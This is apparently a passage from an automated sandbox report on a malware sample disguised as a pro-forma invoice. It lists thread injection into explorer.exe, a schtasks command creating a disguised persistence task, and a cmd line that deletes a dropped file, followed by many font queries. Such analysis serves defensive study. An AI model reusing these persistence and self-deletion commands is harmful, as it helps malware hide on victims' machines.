            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3352Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3352Jump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3352Jump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'Jump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000007.00000000.362766747.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.363404492.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.572235503.0000000003070000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.337688862.00000000087C2000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Users\user\Desktop\Factura de proforma.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
